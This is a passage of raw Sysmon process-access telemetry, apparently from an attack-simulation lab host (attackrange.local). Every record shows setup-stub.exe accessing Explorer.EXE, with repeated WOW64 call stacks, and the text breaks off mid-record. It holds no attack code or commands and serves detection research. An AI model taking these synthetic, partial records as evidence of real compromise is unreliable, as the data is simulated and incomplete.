10341000x800000000000000016557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.sto